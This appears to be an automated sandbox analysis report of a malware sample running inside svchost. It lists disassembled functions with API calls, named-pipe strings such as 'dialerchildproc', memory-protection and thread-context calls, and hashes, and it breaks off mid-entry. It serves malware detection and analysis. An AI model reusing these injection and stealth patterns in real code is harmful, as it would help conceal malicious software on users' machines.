                                                          Function 000002062E992244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: e4484464bd8cbc70f58c61e71c60efa84569e6cbcb1151dc3c5186af29707c8f
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: F7213D76A14750CAEB108B65F44C35A77A0F789BA4F504226EE5902BAACF7CC1D9CB01
                                                          Function 000002062E99A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 572 2062e99a544-2062e99a5ac call 2062e99b414 575 2062e99aa13-2062e99aa1b call 2062e99c748 572->575 576 2062e99a5b2-2062e99a5b5 572->576 576->575 577 2062e99a5bb-2062e99a5c1 576->577 579 2062e99a690-2062e99a6a2 577->579 580 2062e99a5c7-2062e99a5cb 577->580 582 2062e99a963-2062e99a967 579->582 583 2062e99a6a8-2062e99a6ac 579->583 580->579 584 2062e99a5d1-2062e99a5dc 580->584 585 2062e99a9a0-2062e99a9aa call 2062e999634 582->585 586 2062e99a969-2062e99a970 582->586 583->582 587 2062e99a6b2-2062e99a6bd 583->587 584->579 588 2062e99a5e2-2062e99a5e7 584->588 585->575 598 2062e99a9ac-2062e99a9cb call 2062e997940 585->598 586->575 589 2062e99a976-2062e99a99b call 2062e99aa1c 586->589 587->582 591 2062e99a6c3-2062e99a6ca 587->591 588->579 592 2062e99a5ed-2062e99a5f7 call 2062e999634 588->592 589->585 595 2062e99a6d0-2062e99a707 call 2062e999a10 591->595 596 2062e99a894-2062e99a8a0 591->596 592->598 606 2062e99a5fd-2062e99a628 call 2062e999634 * 2 call 2062e999d24 592->606 595->596 611 2062e99a70d-2062e99a715 595->611 596->585 599 2062e99a8a6-2062e99a8aa 596->599 603 2062e99a8ba-2062e99a8c2 599->603 604 2062e99a8ac-2062e99a8b8 call 2062e999ce4 599->604 603->585 610 2062e99a8c8-2062e99a8d5 call 2062e9998b4 603->610 604->603 620 2062e99a8db-2062e99a8e3 604->620 640 2062e99a648-2062e99a652 call 2062e999634 606->640 641 2062e99a62a-2062e99a62e 606->641 610->585 610->620 612 2062e99a719-2062e99a74b 611->612 617 2062e99a751-2062e99a75c 612->617 618 2062e99a887-2062e99a88e 612->618 617->618 621 2062e99a762-2062e99a77b 617->621 618->596 618->612 622 2062e99a9f6-2062e99aa12 call 2062e999634 * 2 call 2062e99c6a8 620->622 623 2062e99a8e9-2062e99a8ed 620->623 625 2062e99a781-2062e99a7c6 call 2062e999cf8 * 2 621->625 626 2062e99a874-2062e99a879 621->626 622->575 627 2062e99a8ef-2062e99a8fe call 2062e999ce4 623->627 628 2062e99a900 623->628 653 2062e99a804-2062e99a80a 625->653 654 2062e99a7c8-2062e99a7ee call 2062e999cf8 call 2062e99ac38 625->654 632 2062e99a884 626->632 636 2062e99a903-2062e99a90d call 2062e99b4ac 627->636 628->636 632->618 636->585 651 2062e99a913-2062e99a961 call 2062e999944 call 2062e999b50 636->651 640->579 657 2062e99a654-2062e99a674 call 2062e999634 * 2 call 2062e99b4ac 640->657 641->640 645 2062e99a630-2062e99a63b 641->645 645->640 650 2062e99a63d-2062e99a642 645->650 650->575 650->640 651->585 661 2062e99a87b 653->661 662 2062e99a80c-2062e99a810 653->662 673 2062e99a7f0-2062e99a802 654->673 674 2062e99a815-2062e99a872 call 2062e99a470 654->674 678 2062e99a676-2062e99a680 call 2062e99b59c 657->678 679 2062e99a68b 657->679 663 2062e99a880 661->663 662->625 663->632 673->653 673->654 674->663 682 2062e99a9f0-2062e99a9f5 call 2062e99c6a8 678->682 683 2062e99a686-2062e99a9ef call 2062e9992ac call 2062e99aff4 call 2062e9994a0 678->683 679->579 682->622 683->682
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: 2896c5bee7702b00d90923b48dd6d454c6dfd265d3efb4a2f5843eac9403c2d9
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: 78E18D72A04B408EEF20DFA5D48D39D77A4F759B98F108126EE8957B9ADB78C4E1C700
                                                          Function 000002062E969944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 451 2062e969944-2062e9699ac call 2062e96a814 454 2062e9699b2-2062e9699b5 451->454 455 2062e969e13-2062e969e1b call 2062e96bb48 451->455 454->455 456 2062e9699bb-2062e9699c1 454->456 458 2062e9699c7-2062e9699cb 456->458 459 2062e969a90-2062e969aa2 456->459 458->459 463 2062e9699d1-2062e9699dc 458->463 461 2062e969aa8-2062e969aac 459->461 462 2062e969d63-2062e969d67 459->462 461->462 466 2062e969ab2-2062e969abd 461->466 464 2062e969d69-2062e969d70 462->464 465 2062e969da0-2062e969daa call 2062e968a34 462->465 463->459 467 2062e9699e2-2062e9699e7 463->467 464->455 468 2062e969d76-2062e969d9b call 2062e969e1c 464->468 465->455 477 2062e969dac-2062e969dcb call 2062e966d40 465->477 466->462 470 2062e969ac3-2062e969aca 466->470 467->459 471 2062e9699ed-2062e9699f7 call 2062e968a34 467->471 468->465 474 2062e969c94-2062e969ca0 470->474 475 2062e969ad0-2062e969b07 call 2062e968e10 470->475 471->477 481 2062e9699fd-2062e969a28 call 2062e968a34 * 2 call 2062e969124 471->481 474->465 478 2062e969ca6-2062e969caa 474->478 475->474 486 2062e969b0d-2062e969b15 475->486 483 2062e969cac-2062e969cb8 call 2062e9690e4 478->483 484 2062e969cba-2062e969cc2 478->484 519 2062e969a2a-2062e969a2e 481->519 520 2062e969a48-2062e969a52 call 2062e968a34 481->520 483->484 499 2062e969cdb-2062e969ce3 483->499 484->465 490 2062e969cc8-2062e969cd5 call 2062e968cb4 484->490 492 2062e969b19-2062e969b4b 486->492 490->465 490->499 496 2062e969c87-2062e969c8e 492->496 497 2062e969b51-2062e969b5c 492->497 496->474 496->492 497->496 500 2062e969b62-2062e969b7b 497->500 501 2062e969ce9-2062e969ced 499->501 502 2062e969df6-2062e969e12 call 2062e968a34 * 2 call 2062e96baa8 499->502 504 2062e969c74-2062e969c79 500->504 505 2062e969b81-2062e969bc6 call 2062e9690f8 * 2 500->505 506 2062e969d00 501->506 507 2062e969cef-2062e969cfe call 2062e9690e4 501->507 502->455 510 2062e969c84 504->510 532 2062e969bc8-2062e969bee call 2062e9690f8 call 2062e96a038 505->532 533 2062e969c04-2062e969c0a 505->533 515 2062e969d03-2062e969d0d call 2062e96a8ac 506->515 507->515 510->496 515->465 530 2062e969d13-2062e969d61 call 2062e968d44 call 2062e968f50 515->530 519->520 524 2062e969a30-2062e969a3b 519->524 520->459 536 2062e969a54-2062e969a74 call 2062e968a34 * 2 call 2062e96a8ac 520->536 524->520 529 2062e969a3d-2062e969a42 524->529 529->455 529->520 530->465 552 2062e969c15-2062e969c72 call 2062e969870 532->552 553 2062e969bf0-2062e969c02 532->553 537 2062e969c0c-2062e969c10 533->537 538 2062e969c7b 533->538 557 2062e969a8b 536->557 558 2062e969a76-2062e969a80 call 2062e96a99c 536->558 537->505 542 2062e969c80 538->542 542->510 552->542 553->532 553->533 557->459 561 2062e969a86-2062e969def call 2062e9686ac call 2062e96a3f4 call 2062e9688a0 558->561 562 2062e969df0-2062e969df5 call 2062e96baa8 558->562 561->562 562->502
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2612748111.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e960000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: 9f8c62b436a95386639ff30f9ebe7f87db452d2fa99f40ae5450db42f3dbda95
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: 43E19E72A04B828EEB64DFA5D48C39D77A4F745B98F100127EE8957B9ACB34C0E1C780
                                                          Function 000002062E99F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: e7192c3f5acd64108e8dc32c78040e43a48c915bb5132f9eff19f6a0add9d644
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: 2A41B362B11B109EEA26CB97A80C7657391FB45BE0F19813B9D1987786EF38C4E5C310
                                                          Function 000002062E99104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 721 2062e99104c-2062e9910b9 RegQueryInfoKeyW 722 2062e9910bf-2062e9910c9 721->722 723 2062e9911b5-2062e9911d0 721->723 722->723 724 2062e9910cf-2062e99111f RegEnumValueW 722->724 725 2062e9911a5-2062e9911af 724->725 726 2062e991125-2062e99112a 724->726 725->723 725->724 726->725 727 2062e99112c-2062e991135 726->727 728 2062e991147-2062e99114c 727->728 729 2062e991137 727->729 731 2062e99114e-2062e991193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->731 732 2062e991199-2062e9911a3 728->732 730 2062e99113b-2062e99113f 729->730 730->725 733 2062e991141-2062e991145 730->733 731->732 732->725 733->728 733->730
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: 5565e805884744de2caf48b57f461c828f77f2deb382236a73201c1823c1d227
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: 7C417173A14B84DEE760CF62E44839E77A1F389B98F04812ADE8907759DF38C895CB10
                                                          Function 000002062E99D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000002062E99C7DE,?,?,?,?,?,?,?,?,000002062E99CF9D,?,?,00000001), ref: 000002062E99D087
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E99C7DE,?,?,?,?,?,?,?,?,000002062E99CF9D,?,?,00000001), ref: 000002062E99D0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E99C7DE,?,?,?,?,?,?,?,?,000002062E99CF9D,?,?,00000001), ref: 000002062E99D0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E99C7DE,?,?,?,?,?,?,?,?,000002062E99CF9D,?,?,00000001), ref: 000002062E99D0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000002062E99C7DE,?,?,?,?,?,?,?,?,000002062E99CF9D,?,?,00000001), ref: 000002062E99D0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: ea09c39112adcfc0d7a6a149c4ed1c65d1936fbc22f4669315bdf4b12759e136
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 5E1130A1F043444DFA68A7FB999D37961416B457F0F28C737AC39476EBDE28E4E28600
                                                          Function 000002062E997510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 99822c6c707f3618ce93774705be731fadbab6488f64d3a7722a8bcacaf5b9fa
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 1981A421E007418EFB54ABE6A44D3A967D0AB85780F14CC37AD0887797EF3AC9F58751
                                                          Function 000002062E999DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: f727f8716d41fd6572176cecb5c1957ea3e61fbc2b4c7587a142daa6d45639af
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: 6F31A521B12740DDEE15DBD2A40C7553294BB48BA0F59C5369D2E07793EF39C4E5C310
                                                          Function 000002062E9A3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: afde603581b83efc234f31076d07dfb56e312ad85d67210eb8e995cad4cff88c
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: DA116321F50B808AE750CB93F84C31976A0FB98FE4F144236EE6987796CF78C4A48741
                                                          Function 000002062E993790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: c2cf6290d6aa110e20cef18ac5c390c1399b0b88e2d708d1033c45b1e7c0e369
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: 6A115B2AB04B41CAEF149FA2E40C26A76A4FB88B85F45403ADE9907796EF3DC595C704
                                                          Function 000002062E995B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction ID: c26c40dcffcbcfb7674a2c4df44c744ece56649b7dfb377018ba6cc0d94da74c
                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction Fuzzy Hash: 10D19A76605B888ADB70DB56E49835A77A0F388B84F104127EECD47BA6DF3DC5A1CB10
                                                          Function 000002062E992F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: a3792dae63591feffdbb5fd13dbd2f9462d42c75ba2c66f24ebc870de18d6abc
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 39318A26F01B558EEB55DF96E94C76AABA0FB45B84F0880369E4847B57EF38C4F18700
                                                          Function 000002062E99CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: 23d0f8ed353a43ae37ba0a508b3abf62ebf00e2037f2770d6d69d053ab15614d
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 74117F61E013448EFA64A7B6598D37D62426B997F0F248737AC36477DBDE2894E18600
                                                          Function 000002062E99199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: 154945b874ac9e7da9822e551e57d75bc6f5633d0c27d4df33d510cd5c2834f5
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: 5B016921B00B408AEB54DB93A84C35A63A1FB88BC0F888036DE5943756DF3CC9DAC740
                                                          Function 000002062E9936C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 9b8adff9cc6b06ed8094505fbd97e0fb4747dd7c92c8805b1ccc8fffb34c007f
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: C0011765E11B40CAEB249BA2E80C31A72A0BB49B86F04443ACD5D07767EF3DC1A88701
                                                          Function 000002062E999005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 3684f044332cf6c978ca63f6206e152fc26990d3b3eaf1044e78e4399bf3dce7
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: 0451A832B017008EEB68DBA5E84CB6937A6F344B88F54C136DE164378AEB75C8E1C700
                                                          Function 000002062E998FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: c96856252481d040c173ec3a9abf56c4823fccf44e83a0651b94f4b561db3eaf
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: FF31BC32A007408EEB24EF52E84CB1A3BA5F744B88F05C026EE560378ADB39C9A0C705
                                                          Function 000002062E991A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: c05455d53d704ef0c24bc7bc56514995e97f117eb4d308694ff309523f172559
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: B7F03662B0474195EB608BA6F88C7596761F758788F848032DE4946656DE6CC6DDCB00
                                                          Function 000002062E993044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: 9ce498e0dc2dd4d43abdafd1fec37ba98cbd1f6cd348fb8439fe1139c27f55e1
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: DEF08C60F04B8086EA008F93B90C119A260AF48FC0F088132EE5A07B1BDF3CC4E68741
                                                          Function 000002062E99BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002C.00000002.2613369802.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_44_2_2062e990000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: 0074bc292550b1035626d9875f07d21ffb4b56e4922744dc7dc1157b86e98e5f
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: D8F06261F11B0489EB108BA9E45D3597320EF85B61F54422ACE6A463E6DF2DC4E5C341
                                                          Function 000002062E9950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
